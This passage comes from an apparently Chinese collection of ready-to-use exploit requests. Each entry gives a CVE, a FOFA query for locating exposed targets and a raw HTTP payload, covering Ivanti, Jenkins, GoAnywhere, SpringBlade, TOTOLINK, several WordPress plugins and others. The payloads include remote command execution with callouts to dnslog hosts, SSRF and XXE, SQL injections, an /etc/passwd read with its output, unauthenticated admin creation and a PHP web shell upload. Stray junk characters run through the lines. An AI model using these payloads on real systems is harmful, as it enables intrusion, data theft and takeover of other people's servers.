# u) k3 L' l2 d7 @Content-Length: 121
1 O3 _6 T; W' |+ n3 i* H$ X8 u+ eAccept: */*, I9 @; a' f2 E0 m
Accept-Encoding: gzip, deflate
1 A0 I9 f/ d4 f+ x b6 W, x% iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- J4 P" M" l2 l& G% N, P* {
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
, [* O0 C3 ?) b( w4 ~X-Requested-With: XMLHttpRequest: `! e" q4 i) B/ h! i
3 }# A; |# Y* K; n
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
* E& b, S; n s$ k! N( U9 y
3 y+ n2 x4 `3 x
% ~% P7 _/ [1 x. s& Y6 M) q) j99. Ncast盈可视高清智能录播系统busiFacade RCE* d1 _, q+ ]1 @* P" G3 \ N
CVE-2024-03054 P9 s2 U# e$ U6 Q" D6 n+ q
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
- X0 R$ \- V V! }4 VPOST /classes/common/busiFacade.php HTTP/1.18 P& u" V% {6 @5 m Z. j
Host: 192.168.40.130:8080
" @2 g5 w' |2 u, O1 h: OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; ^ W8 Z1 s0 @6 Y) x
Connection: close) x7 ] S' m9 b
Content-Length: 154, ~( }) t0 X6 h+ G9 C, s3 F
Accept: */*8 O# P& o8 b, b* D
Accept-Encoding: gzip, deflate
/ g g$ i$ M" n; {" r8 Z; MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 A) P0 m( f# S" M5 g8 L S
Content-Type: application/x-www-form-urlencoded; charset=UTF-8; q- s; Q& w: {' @" X
X-Requested-With: XMLHttpRequest
* ]0 j5 o5 S* K7 y9 F9 c# Z* y$ Z
1 ^- O* V$ I, W- u% w%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D: F5 ]# o1 q1 a8 @0 u
0 }% b1 q1 W, L. u. F4 x
6 Q' _" ~ e! s% G! t- S/ _100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
; Y- y! T3 d0 KCVE-2024-0352
% ?$ h: ]# }/ FFOFA:icon_hash="874152924"; O! b% j2 Q0 T. Y" R
POST /api/file/formimage HTTP/1.1
6 U. A+ |% y" u( qHost: 192.168.40.130% K4 p8 ]# Z) q3 S$ u( ~& N
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
! k$ _& w, f7 M2 j. G; ?0 ~, lConnection: close
+ ? P! B P7 C* xContent-Length: 2010 w$ \9 K3 i" |5 e$ X
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei. T& j/ M* N+ O4 { I& q n
Accept-Encoding: gzip F8 k7 i0 P' X( `9 r: F1 B, d
+ D" q+ e' |% n, Z& P$ C, _: g7 q------WebKitFormBoundarygcflwtei
5 E3 U* i. B7 lContent-Disposition: form-data; name="file";filename="IE4MGP.php"7 g* ~+ z0 ]/ _, E- R- e
Content-Type: application/x-php
4 [8 ], Q- e) W3 D
9 ~- B6 y) q/ k7 P# K2ayyhRXiAsKXL8olvF5s4qqyI2O$ J; y6 g* Q+ z
------WebKitFormBoundarygcflwtei--" t) A& q8 m7 G% x$ Z
+ `8 C" i7 g* B# k9 G
2 p2 _$ b0 A6 U6 x101. ivanti policy secure-22.6命令注入
) r5 Y6 ^$ d$ F) f0 A; |) pCVE-2024-21887
: v3 t1 F) X8 j% @8 H( qFOFA:body="welcome.cgi?p=logo"3 S# i0 o. H* j- \& g; w
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
# f9 H; F$ ~% |1 L9 EHost: x.x.x.xx.x.x.x& n1 t3 {& l5 Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36& H& m, N: p9 y3 D( @: \
Connection: close3 t5 ?/ E4 d% S1 w6 _: D
Accept-Encoding: gzip: Z8 H! N/ O6 T' F: x! T
+ Z+ h( ^0 r9 F, `9 q6 D% m% G; ]% u# W
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
% a H' I" F0 }, W0 z2 e+ uCVE-2024-21893' J5 ?/ T8 D" x( ]
FOFA:body="welcome.cgi?p=logo"1 H) }7 s' g3 d5 c! ]% P
POST /dana-ws/saml20.ws HTTP/1.1
" @, ~, t B. t# h ?Host: x.x.x.x" p. l$ A# w8 ]; O' e. t+ _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36/ j7 C6 c+ s& e X! D! m$ ~7 t
Connection: close9 J2 P2 R6 i9 h7 s
Content-Length: 792' Q& N* a! n8 @
Accept-Encoding: gzip+ n; N" w( x/ @; D3 m* s
/ x4 e" m* g; i4 o<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>3 J- `# L7 A! Q9 M9 `2 i
+ _" A1 w4 C; P7 a
103. Ivanti Pulse Connect Secure VPN XXE9 @( X9 Q0 K1 @2 R
CVE-2024-22024# T8 p$ E5 r; a8 U1 Z
FOFA:body="welcome.cgi?p=logo"
0 X0 W( l) e# _7 P8 l& APOST /dana-na/auth/saml-sso.cgi HTTP/1.1
2 Q$ m7 J& q7 H4 a, r3 `- ?Host: 192.168.40.130:111- e9 {+ ^6 j- v( C3 G6 E3 Y* c
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
0 G7 l* C1 [9 B9 i% jConnection: close
) M; x: U S; `+ g+ I$ jContent-Length: 204
# r- i2 U5 o# E) ?4 a7 r( AContent-Type: application/x-www-form-urlencoded8 m6 E6 t! f% |
Accept-Encoding: gzip2 b' u% g8 w$ i: _7 G$ @3 ^9 F3 O
/ q& J: I8 c8 i2 l: _) e
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==1 x0 p3 O! V; a! l
4 M1 F$ R! M" J" W; t8 u3 J* ~
+ M, a" y, i9 E$ ]2 ]8 u: V( n: I
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
3 i2 ]+ m4 w1 g/ y G<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>( B- I9 G/ }( R
7 Q2 b1 u0 J! _: i, l
, F, F* q0 x6 m% G, T104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露3 B7 G3 P3 O; G3 v! }, W
CVE-2024-0569
& L# ]# N1 `! _FOFA:title="TOTOLINK"
0 W( f! c2 F3 d8 K) YPOST /cgi-bin/cstecgi.cgi HTTP/1.1, Q% e& X* ]5 N# _, p% M
Host:192.168.0.1
3 S4 K) @8 v. f" kContent-Length:41
, \2 X5 s& u6 v* J( L2 BAccept:application/json,text/javascript,*/*;q=0.01! C- w* |, q4 {
X-Requested-with: XMLHttpRequest
2 g! b% t3 N9 D# oUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.363 y9 H4 E _0 l* K/ |9 L
Content-Type: application/x-www-form-urlencoded:charset=UTF-8! `5 H# I9 j, f6 `0 j) x" ?
Origin: http://192.168.0.1
7 M2 Q. Q# v+ w1 t, ]Referer: http://192.168.0.1/advance/index.html?time=1671152380564* E! B8 E @3 J7 Q% E1 v( ]- a
Accept-Encoding:gzip,deflate) F4 @. Q. O; v$ Y) j, Y
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
# E$ J5 b9 s4 Q% F6 D( SConnection:close; D3 J+ D Z5 Z& K: ]! X- c" X2 J
) }1 o" S ^7 H9 t( P2 o- d
{
1 o: T( r/ O4 A' \* u) ~"topicurl":"getSysStatusCfg",& Y7 R7 b2 d* D' k3 W: K
"token":""/ N- d' c% ^( U+ g; o- V7 u0 q4 |
}: w$ w6 z" v+ c$ ^
- G5 p& Q, R' s% B& W8 t105. SpringBlade v3.2.0 export-user SQL 注入0 w1 L" x4 X( A( [* ~
FOFA:body="https://bladex.vip"
A5 p$ G; A8 X: ~5 Chttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1. Z( Z2 {8 V( O& P6 C2 m" {
0 C: ?9 `/ t2 m/ y( I
106. SpringBlade dict-biz/list SQL 注入4 ?6 r+ }+ ]+ k" X0 n
FOFA:body="Saber 将不能正常工作"9 H% A, q, e8 {$ [ C) K/ ^! i q
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
5 o& H* D* @7 c. s5 q, p2 Y. FHost: your-ip
& I. a) B& E" \# ^* c# Y8 v% tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 U7 W* v6 U3 S+ hBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A9 d. `/ G$ p$ M) Y, Q
Accept-Encoding: gzip, deflate
; Q" Z V3 @7 o! sAccept-Language: zh-CN,zh;q=0.9
) [- y, T+ i$ K m8 o9 B- EConnection: close- j' w$ O! i9 L. j4 k5 |8 ]
4 h, G9 V8 o. F2 E- M
6 T- [, @ V* m U6 R$ H; E! M
107. SpringBlade tenant/list SQL 注入
7 C% B# {3 O% Z! u' ]FOFA:body="https://bladex.vip"& M! {3 @3 T3 [7 P& A. O B
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
6 |, e8 `0 N" A: h. BHost: your-ip8 }2 q6 U% O9 R1 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 Y$ b4 ^& J5 {9 sBlade-Auth:替换为自己的
, n7 k" f6 @! f w# qConnection: close
( z6 i5 X; ^4 U3 s9 M, W' R+ ~' \. o& T) ]' {
/ |2 R9 y: {0 Q9 c$ d
108. D-Tale 3.9.0 SSRF
+ q+ W0 ?% o" t" i ]+ v) GCVE-2024-21642
; H& Y& Y! s* }' n9 ]5 fFOFA:"dtale/static/images/favicon.png"
9 g- H/ c) d4 SGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
: l6 r9 f4 I( j; ]7 T! V. OHost: your-ip' O* h B4 U% R" q" r1 `% K
Accept: application/json, text/plain, */*
+ ^' G$ @8 [+ @+ D6 k: J3 l5 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.361 M* i6 { n0 Z H3 r; ]
Accept-Encoding: gzip, deflate( r9 r7 g6 @7 j6 c2 b% ] O1 ~
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
1 A. y) p9 i3 dConnection: close4 q9 p" Y' C) ~. f
/ k7 j4 j1 o3 J0 l
9 ?, h M8 ?' u: h- J7 ?109. Jenkins CLI 任意文件读取2 }" u& Z! \; G' L+ @9 K
CVE-2024-23897 t) S3 a* D! V5 } K: ]$ h
FOFA:header="X-Jenkins"
9 q& g& z: C) u* W1 kPOST /cli?remoting=false HTTP/1.11 D1 \: Y1 h2 y0 @' b7 p% n7 m
Host:+ o, K7 t1 m$ Z( x* A) E
Content-type: application/octet-stream
+ }6 J/ Y7 d$ a& GSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e928 w1 `0 x, s# ]5 Z. |
Side: upload1 G% [% ~/ c6 f
Connection: keep-alive
2 w, ]/ s6 C& {- cContent-Length: 163
/ I; n( v K. P# Q7 K$ a
( s$ \/ c- i I. A" D6 _b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03': u. a8 x1 I. R7 Q
6 D( c3 Q$ g/ s1 Q5 ~( u2 x5 E& q2 d2 {4 R
POST /cli?remoting=false HTTP/1.1
! Q: |) R8 Y/ x& ^Host:; {, e6 V1 F. s- x0 l3 `
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92; \2 Q0 ^% z# f
download
) u" \( K: R3 D, a2 I; U8 Y8 UContent-Type: application/x-www-form-urlencoded
7 ?: O& P, }. x9 |Content-Length: 0! Q/ x& E- }+ `2 O: |* r# F$ u ~" d
* w, r6 M$ u" I5 B) ?. g! {
Q: N" L& I( B% F2 h! z, @ @1 S% [
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin/ U5 x) q$ c: e8 l' f8 u! y
java -jar jenkins-cli.jar help
# f# D' b S h2 R: o1 C1 L[COMMAND]# f/ A$ d- o" D5 k7 d4 P, [& n
Lists all the available commands or a detailed description of single command.
2 y$ g8 [5 S4 j2 L$ d. F COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)% ?1 t7 Z A9 M- |! X4 u
+ U9 H5 ^1 K" w8 Q6 f4 Y
) c9 t$ w/ w/ Y% M
110. Goanywhere MFT 未授权创建管理员! m. n' j# K% X: H& _: V. ~* H/ L# v
CVE-2024-0204
+ E" b5 C" i, x/ X" z$ R6 y [FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"1 C: s) C0 S4 A0 D# g9 r) B
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
% n6 a$ S' `2 }8 C$ a! Q+ C- QHost: 192.168.40.130:8000 A2 P# m% s9 W. W; x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
: Y! A; O' g: q$ q9 ]Connection: close* D, q7 q( x# \6 r' }1 ^
Accept: */*
8 ~9 L) _9 f' D/ o" dAccept-Language: en
1 w# K+ m2 B& {Accept-Encoding: gzip* Z' ]2 G$ h& }6 K
0 v: H+ g$ d# F8 Z( j2 b: B
/ Y/ \8 q: k% J* a& C" h
111. WordPress Plugin HTML5 Video Player SQL注入' L m" s* u1 U6 Q4 m/ Y1 T+ ~
CVE-2024-1061
6 D/ ?( j8 _ `4 dFOFA:"wordpress" && body="html5-video-player"( c- M8 U3 `3 W
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1$ f5 S: f2 V7 c( {% n
Host: 192.168.40.130:112& l! Q5 o: _5 D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
7 I. N. x- r" I6 g; i. R1 GConnection: close: L0 f0 y% q8 _3 s9 ^* t! w9 p* J
Accept: */*
% N8 L1 Z! `- V u4 `+ W) KAccept-Language: en5 w& R' c- a- x" P
Accept-Encoding: gzip
: b" f' ?" l% I4 I. u7 q
) L2 U5 |) g/ N4 y: Y
2 j& N9 f d2 Q! s6 s+ c112. WordPress Plugin NotificationX SQL 注入
4 T# z) t: B5 v2 @+ `CVE-2024-1698
1 D; p) D2 Z: p: i! UFOFA:body="/wp-content/plugins/notificationx"# x. ~. d' x; R4 j) \" N+ o6 e" b
POST /wp-json/notificationx/v1/analytics HTTP/1.1
& R6 v4 L# Q! [ W% N8 ~Host: {{Hostname}}
1 o" d( g* w* W$ y0 k6 oContent-Type: application/json
: @5 M5 ^4 F3 @( E& W$ K
# m+ y8 [6 ~ T4 E4 E{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
- V( v( ]5 C! l/ \" G( m, l G/ J1 D. @- x/ I/ F
: B3 s4 e& g) O7 l ?. X113. WordPress Automatic 插件任意文件下载和SSRF
' @+ X; f3 n& |0 R! w- o( F. BCVE-2024-279544 J9 [# _: b9 x% i& a; O$ J9 Q9 @
FOFA:"/wp-content/plugins/wp-automatic"0 ?, h5 t5 ]2 O" o
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1$ N9 p. z2 V5 d' Z* o0 o
Host: x.x.x.x
5 S% b% v3 f% ^2 Z2 y# _User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
5 L6 B6 p* `( o8 \1 `/ tConnection: close) B0 }* c1 H5 H( c# z0 o- F
Accept: */*
8 z3 V/ J% S' }0 t, bAccept-Language: en
0 U* x* F+ ~+ @Accept-Encoding: gzip
v5 k( L! g7 ?( g7 k5 \" Z) V9 m- S
% ?; R; E6 D3 x9 |5 f; }: q114. WordPress MasterStudy LMS插件 SQL注入
% _* f2 }9 o1 h1 u7 U, n: X/ KFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"# o6 ~2 V3 I1 Q
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1+ i& \: C, k) ~+ M* u
Host: your-ip2 S" g" }, X' d2 ~- i
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36- f+ S8 b! G% ]( }! x
Accept-Charset: utf-8
3 r) B- ]* `: D4 eAccept-Encoding: gzip, deflate0 {3 F P; R9 m1 [7 p7 `
Connection: close' T ~8 N/ T4 ^: U) [, y- x
I$ t5 G7 ^1 \# t
; f- v3 v% P3 H1 ^1 ~% S115. WordPress Bricks Builder <= 1.9.6 RCE5 D: R/ P* ~/ O4 b/ {# g6 |5 M, o
CVE-2024-25600, c8 z9 g3 t, ~" o# J; C8 K0 a
FOFA: body="/wp-content/themes/bricks/"
% W6 \ q7 c2 w6 \2 |第一步,获取网站的nonce值% j4 \ ^( \. K5 Y* r/ T
GET / HTTP/1.1! }! ]' b. K' m' n/ L
Host: x.x.x.x
( H1 S; ~3 ~" J7 g AUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
, \( j! _" O3 \; w9 v6 d# o+ ZConnection: close+ o; U) S/ ^* J0 V) ^2 s o8 H8 }2 w
Accept-Encoding: gzip
. Q) ~* v6 @. x
7 r. d- w# f+ Y; t
' s5 k+ ~/ i3 b% u3 H+ ~第二步替换nonce值,执行命令- T7 x! w! x, }, B0 a
POST /wp-json/bricks/v1/render_element HTTP/1.10 H, y6 U W: A
Host: x.x.x.x/ t7 x: x* c6 G3 Z- x% h9 C( `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36) J) x2 }! {, g( ?. T! y
Connection: close
) q' x& c: S0 x3 W" P& d9 r. v8 ZContent-Length: 356
1 Z! {0 N! c0 X7 i' {& YContent-Type: application/json* } V! l* W" C- C2 c
Accept-Encoding: gzip! Y5 w/ J9 h4 u2 K# b0 C
9 i. B2 e7 C* j% K! b; C5 x{( Y/ ~+ Q; p0 e* i6 A: `
"postId": "1",
# q& `+ L0 `; L8 P4 }, Z" m "nonce": "第一步获得的值",* x. B) q7 H' R' n" E8 w
"element": {& G; J C3 C0 _( K$ F- U6 _; ^
"name": "container",
* \8 M* P3 t/ X" o( o& P "settings": {$ \, L: a+ K L
"hasLoop": "true",8 b1 Q, I+ X* i& b" v
"query": {
3 X* H \: m, z4 s, a b* G7 p "useQueryEditor": true,
/ g9 D' A/ d- v( c9 w# f "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",# |% u$ a3 Y( F
"objectType": "post"
+ T2 h4 m! d7 A# r) [ }' j5 G2 w" s6 I4 s8 q/ |+ I
}
, J; h P; t, K5 h }
& K2 i( }8 s( f+ l* J7 M}* g# g: r5 f R" W
% F1 F, I4 S& B; o- D( w
e! p! p) u$ z116. wordpress js-support-ticket文件上传1 [) W. g! ~- |0 r4 ?0 J
FOFA:body="wp-content/plugins/js-support-ticket"
$ Z5 \* Z8 D9 uPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.10 i, ~ w4 y& @, d
Host:+ f+ R1 Q# b- C" h* E
Content-Type: multipart/form-data; boundary=--------767099171
/ a! [2 g; @7 O, M+ v3 l; AUser-Agent: Mozilla/5.01 M8 Z- z9 P6 }% t8 Z( O
: q6 t- n+ Y( X( B# R3 g----------767099171
; X" [- B( ?6 c" h& i8 _Content-Disposition: form-data; name="action". e/ a$ B: q4 w/ G
configuration_saveconfiguration
0 A) Z" j0 h# I3 \2 ~, J----------767099171
% ]1 B7 X# b: f- s1 X8 J! V( i/ a/ |Content-Disposition: form-data; name="form_request"; g- I' y0 l, K: ~- X7 K4 o) F
jssupportticket$ G; o, ]- q: V. `: P% r% I
----------7670991715 L5 C" p2 g( ^5 I% u
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"3 E0 z2 D. p( }) D! a, ^% T
Content-Type: image/png" D4 x5 {7 F: T' a, ?5 w
----------767099171--
' u8 ^( w- o! T- |0 u! V) E3 T
; E9 m. {% a& ^& ^! A: N; a7 J
* P/ ^2 h8 `: d) o/ K7 w117. WordPress LayerSlider插件SQL注入
4 J9 R' f8 \2 @2 s7 x" }version:7.9.11 – 7.10.0
0 z! J# O& u, i: n6 ]- dFOFA:body="/wp-content/plugins/LayerSlider/"
7 n3 O, s2 |, m; K/ |7 p+ ?GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1: o1 I8 R8 [+ V2 b6 L- h- A4 F/ j
Host: your-ip
+ ?6 W3 k* [% ^& n2 h) RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
/ ]' {* R) G6 QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ ] h. N( P- a: m5 _; SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! J8 x" U$ k4 |/ v, l8 |2 J
Accept-Encoding: gzip, deflate, br
$ U9 a) h: Y6 M! ZConnection: close
) S' U* v* R9 _/ N% G( gUpgrade-Insecure-Requests: 18 l; p i. D9 B: G
5 h& }8 j: T L
" M {) y% O( W5 k( l
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
% j) v, w4 F! ^- F% \CVE-2024-0939
* v( g# Y" c! U6 mFOFA:title="Smart管理平台"* P6 q8 f' Q0 R' N
POST /Tool/uploadfile.php? HTTP/1.1% X; l5 L. j3 Z9 c4 }0 ]2 _
Host: 192.168.40.130:8443
; z( G4 Z t! ?& [- Z1 s. Q* vCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8! v F: O0 Y) D8 t1 U& u+ Z$ l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0* _8 h4 f7 t7 I, [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; `, \% ~; V' s, H- z6 dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, J8 G5 I) a, X( AAccept-Encoding: gzip, deflate/ U: U% X% } a
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887, o( B# a) H- {3 N$ Y) x% d/ Z
Content-Length: 405
, e" C5 B' D k6 J# v9 n! aOrigin: https://192.168.40.130:8443
# |+ |- [) _0 p6 j& i+ i# S' `Referer: https://192.168.40.130:8443/Tool/uploadfile.php
5 {3 |; |) O: S) j: T7 ?7 FUpgrade-Insecure-Requests: 1
. [& G# z& o. r/ {" t% zSec-Fetch-Dest: document
& h# Y9 m& G; ?Sec-Fetch-Mode: navigate
* [% R4 h5 `" J$ C$ q% A6 PSec-Fetch-Site: same-origin
' ]: `% J c" ~3 n! z8 n LSec-Fetch-User: ?1
2 Q: [% _+ Z8 a' R. kTe: trailers
, m. v, n% v; p6 t& j8 }Connection: close
. ]0 J3 b" s' M. M
3 I! z6 [5 \5 u6 m8 J-----------------------------13979701222747646634037182887
# ` }5 ^" F) X. n" ]2 F1 g) @Content-Disposition: form-data; name="file_upload"; filename="contents.php"
5 P+ W+ K) x' d" I* b. n4 X$ p) [7 fContent-Type: application/octet-stream: o0 t u+ T" _
# Q: E5 N9 ?. [3 Z2 |<?php1 x3 l3 I% }+ c4 f. y2 g$ G, u
system($_POST["passwd"]);
/ V$ A/ o V- w?>
7 }5 F6 w2 P" l( k4 R-----------------------------13979701222747646634037182887
1 k- {/ h3 I4 LContent-Disposition: form-data; name="txt_path"
5 V- ?& b( E" o
, z) \- f* d I1 l# P3 H" b/home/src.php2 N0 K P' ~# s3 \2 j* s
-----------------------------13979701222747646634037182887--
$ l/ T9 h$ Z0 Q9 p' T' ~. x5 c) E
2 S% Z$ ?; U( i访问/home/src.php
& n/ X/ L |8 r% C4 Q2 f# z6 v4 |) z3 K* m' A: g; }7 I
119. 北京百绰智能S20后台sysmanageajax.php sql注入: Q$ E7 H3 ^: q `
CVE-2024-1254
) S. i$ ^( ?% c# \/ ?$ q& d8 n) ZFOFA:title="Smart管理平台") N( s. ?1 S* O' o5 ?6 Z( r
先登录进入系统,默认账号密码为admin/admin' L& h& }0 O3 g
POST /sysmanage/sysmanageajax.php HTTP/1.11
" z. r0 j G3 P7 T. G0 V3 I. ^4 m6 \( UHost: x.x.x.x
+ J4 H/ T/ _2 ]3 ]8 ACookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
, @6 {& C! ?* {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
# b, ]- c3 g3 \9 ^) O. m- n; a0 rAccept: */*
) h2 F8 E& [6 v. {4 Q) UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ ~& n( h P3 h
Accept-Encoding: gzip, deflate4 P3 Q# Z6 [+ {
Content-Type: application/x-www-form-urlencoded;
, h# t! B; B+ w, Q5 NContent-Length: 109/ g9 @) y: b% Q0 T" \+ @
Origin: https://58.18.133.60:8443
4 `/ q# Q. w4 n' W' d: a; l4 aReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php* D t$ ]. q& K" H
Sec-Fetch-Dest: empty- a+ V g8 _1 j5 b8 x+ P
Sec-Fetch-Mode: cors& ~% b8 }& a) y1 m+ i
Sec-Fetch-Site: same-origin! b1 d4 L( k2 W! Y
X-Forwarded-For: 1.1.1.1
. C0 B- y& x( g1 T0 ^' E6 @) VX-Originating-Ip: 1.1.1.1
